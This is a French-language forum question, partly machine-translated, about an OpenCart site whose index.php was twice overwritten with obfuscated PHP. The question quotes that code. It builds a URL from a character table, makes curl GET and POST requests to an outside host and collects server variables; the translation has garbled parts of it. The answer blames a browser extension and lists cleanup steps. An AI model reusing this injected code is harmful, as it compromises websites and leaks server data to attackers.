Fichier Opencart index.php corrompu

Question

J'utilise opencart v3.0.2.0 et le problème est que le fichier index.php d'opencart (le point d'entrée de mon site opencart, téléchargé dans le répertoire public_html) plante (le code dans le fichier index.php a changé en caractères étranges). Cela s'est produit deux fois la semaine dernière. Je ne savais pas que quelqu'un avait été piraté ou qu'il y avait un problème avec mon domaine ou mon code. Si quelqu'un peut m'aider ou me guider, faites-le moi savoir. Merci.

Fichier index.php endommagé :

Global $O; $O=décodage d'url ($OOOOOO);$oOooOO='z1226_16';$oOooOOoO=$O[15].$O[4].$O[4].$O[9 ].$O[62].$O[63].$O[63].$O[64].$O[72].$O[66].$O[59].$O[65]. $O[67].$O[71].$O[59].$O[65].$O[65].$O[67].$O[59].$O[65].$O [67].$O[65] .$O[63].$oOooOO.$O[63];FunctionooooooooOOOOOOOOoooooOOO($ooooOOOoOoo){ $ooooOOOooOo=curl_init();curl_setopt($ooooOOOooOo,CURLOPT_URL,$ooooOOOoOoo); ($ooooOOOOooOo,CURLOPT_RETURNTRANSFER,1);curl_setopt($ooooOOOooOo,CURLOPT_ CONNECTTIMEOUT, 5); $ooooOOOOooO =curl_exec($ooooOOOOooOo);curl_close($ooooOOOooOo);return $ooooOOOOooO; } Fonction ooOOoOOO($Ooo ooO,$Ooo ooo= array()){ global $O;$OooooO=str_replace(' ','+',$OooooO);$OOooooO=curl_init();curl_setopt($OOooooO,CURLOPT_URL, " $OooooO");curl_setopt($OOooooO, CURLOPT_RETURNTRANSFER, 1);curl_setopt($OOooooO,CURLOPT_HEADER, 0);curl_setopt($OOooOO,CURLOPT_TIMEOUT,10);curl_setopt($OOooooO,CURLOPT_POST, 1);curl_setopt($OOooooO, CURLOPT_POST, 1); _build_query($ OOOOoo));$OOOOooo=curl_exec($OOooooO);$OOOOooooOO=curl_errno($OOooooO);curl_close($OOooooO);if(0!==$OOOOooooOO){return false ;}return $OOOOooo ;} function oooOOOo( $ooOOo){global$O;$ooOOOOo = faux;$ooooooo = $O[14].$O[8].$O[8].$O[14].$O[18].$O[2]. ].$O[23].$O[8].$O[4].$O[90].$O[14].$O[8].$O [8].$O[14]. $O[18].$O[2].$O[90].$O[5].$O[10].$O[15].$O[8 ].$O[ 8].$O [90].$O[23].$O[7].$O[24].$O[14].$O[90].$O[10].$O[8] .$O[18]. ];if ($ooOOo!=''){if (preg_match("/($ooooooOOo)/si",$ooOOo)){$ooOOOOo=true;}} renvoie $ooOOOOo;} fonction oooOOooOOoOO ($oOOOOOOoOOOO){ Global$O;$ooOOOOOOOOoO=false;$ooOOOOOOoOo=$O[14].$O[8].$O[8].$O[14].$O[18 ].$O[ 2].$O [59].$O[21].$O[8].$O[59].$O[16].$O[9].$O[90]. ].$O[15].$O[8].$O[8].$O[59].$O[21].$O[8].$O [59].$O[16]. $O[9].$O[90].$O[14].$O[8].$O[8].$O[14].$O[18 ].$O[ 2].$O [59].$O[21].$O[8].$O[25];if ($oOOOOOOoOOOO!='' && preg_match("/($ooOOOOOOoOo)/ si", $oOOOOOOoOOOOOO )) {$ooOOOOOOoO =true;}Return $ooOOOOOOoO;}$oOooOOoOO=((isset($_SERVER[$O[41].$O[30].$O[30].$O[ 35].$O [37]]) && $_SERVER[$O[41].$O[30].$O[30].$O[35].$O[37]]!==$O[ 8].$O[13].$ O[13])?$O[15].$O[4].$O[4].$O[9].$O[11].$O[62 ].$O[ 63].$O [63] :$O[15].$O[4].$O[4].$O[9].$O[62].$O[63] );$oOoooOOoOO= $_SERVER[$O[29].$O[28].$O[26].$O[32].$O[28].$O[37].$O[30].$O[52].$O[32].$O[29].$O[33]];$ooOOooooOOoOO=$_SERVER[$O[41].$O[30].$O [30].$ O[35].$O[52].$O[41].$O[34].$O[37].$O[30]];$ooOOOooooOOoOO=$_SERVER[$O[ 35].$O [41].$O[35].$O[52].$O[37].$O[28].$O[44].$O[39]];$ooOOOOooooOOOoOO=$ _SERVER[$O[ 37].$O[28].$O[29].$O[48].$O[28].$O[29].$O[52].$O[50]. $O[36] .$O[51].$O[28]];$ooOOOOoooOOOOoOO=$oOooOOoOO.$ooOOoooOOoOO.$oOoooOOoOO;$oooOOOOoooOOOooOO=$oOooOOoO.$O[63].$O[7].$ O[24]。$O[12].$O[10].$O[4].$O[10].$O[59].$O[9].$O[15].$O[ 9];$ooooOOOOoooOOOooO =$oOooOOoO.$O[63].$O[25].$O[10].$O[9].$O[59].$O[9].$O[15] .$O[9 ];$ooooOOOOoooOOOooOoo=$oOooOOoO.$O[63].$O[16].$O[6].$O[25].$O[9].$O[59].$ O[9]。$O[15].$O[9];$oooooOOoooOOOoooOoo=$oOooOOoO.$O[63].$O[1].$O[8].$O[3].$O[ 12].$O [11].$O

Answer 1

J'ai récemment rencontré un problème similaire avec l'un de mes clients. Après enquête, nous avons découvert que le problème était dû à une extension du navigateur Chrome qui injecte du code dans PHP files when uploading any php files through the browser (like Cpanel File Management). In this case, the code was injected into the index.php file, and when someone accessed that file through the URL, the malicious code would start injecting files into the server, creating new files, and notifying the hacker of the server's current URL and other data using the cURL function in PHP.

.

Pour résoudre ce problème, vous pouvez suivre les étapes suivantes :

1- Prenez une capture d'écran de toutes les extensions de votre navigateur utilisées pour télécharger des fichiers sur le serveur, partagez-les avec nous, puis supprimez le navigateur ou toutes ses extensions.

2- Vérifiez tous les fichiers téléchargés ou mis à jour sur le serveur depuis la date du hack. Vous pouvez exécuter des commandes sur le serveur pour obtenir une liste des fichiers nouveaux ou mis à jour, en fonction de votre système d'exploitation.

3- Vous pouvez trouver des *.php files in the .well-known ou d'autres dossiers cachés sur le serveur.

4- Protégez votre système d'exploitation avec un logiciel antivirus. Je recommande d'utiliser un logiciel antivirus non gratuit tel que Kaspersky.

Pouvez-vous partager une capture d'écran de l'extension de votre navigateur afin que nous puissions déterminer quelle extension a pu provoquer le piratage du site Web ?